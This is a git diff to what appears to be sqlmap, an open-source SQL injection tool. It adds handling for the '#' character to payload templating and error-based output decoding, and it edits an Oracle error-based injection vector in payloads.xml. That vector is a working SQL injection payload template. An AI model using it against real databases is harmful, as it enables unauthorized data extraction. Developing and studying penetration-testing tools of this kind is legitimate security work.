diff --git a/lib/core/agent.py b/lib/core/agent.py
index 07261b5fc..f45b8c500 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -217,7 +217,8 @@ class Agent:
         _ = (
                 ("[RANDNUM]", str(randInt)), ("[RANDNUM1]", str(randInt1)), ("[RANDSTR]", randStr),\
                 ("[RANDSTR1]", randStr1), ("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\
-                ("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar)
+                ("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar),\
+                ("[HASH_REPLACE]", kb.chars.hash_)
             )
         payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload)
 
diff --git a/lib/core/option.py b/lib/core/option.py
index 7c5f3e570..91ba1ed80 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1502,9 +1502,8 @@ def __setKnowledgeBaseAttributes(flushAll=True):
     kb.chars.delimiter = randomStr(length=6, lowercase=True)
     kb.chars.start = ":%s:" % randomStr(length=3, lowercase=True)
     kb.chars.stop = ":%s:" % randomStr(length=3, lowercase=True)
-    kb.chars.at = ":%s:" % randomStr(length=1, lowercase=True)
-    kb.chars.space = ":%s:" % randomStr(length=1, lowercase=True)
-    kb.chars.dollar = ":%s:" % randomStr(length=1, lowercase=True)
+
+    kb.chars.at, kb.chars.space, kb.chars.dollar, kb.chars.hash_ = (":%s:" % _ for _ in randomStr(length=4, lowercase=True))
 
     if flushAll:
         kb.headerPaths = {}
diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py
index f4f923091..ab394b2ec 100644
--- a/lib/techniques/error/use.py
+++ b/lib/techniques/error/use.py
@@ -180,7 +180,7 @@ def __errorReplaceChars(value):
     retVal = value
 
     if value:
-        retVal = retVal.replace(kb.chars.space, " ").replace(kb.chars.dollar, "$").replace(kb.chars.at, "@")
+        retVal = retVal.replace(kb.chars.space, " ").replace(kb.chars.dollar, "$").replace(kb.chars.at, "@").replace(kb.chars.hash_, "#")
 
     return retVal
 
diff --git a/xml/payloads.xml b/xml/payloads.xml
index 99d65321e..b51ff2373 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -1242,7 +1242,7 @@ Formats:
         <risk>0</risk>
         <clause>1</clause>
         <where>1</where>
-        <vector>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
+        <vector>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
         <request>
             <payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
         </request>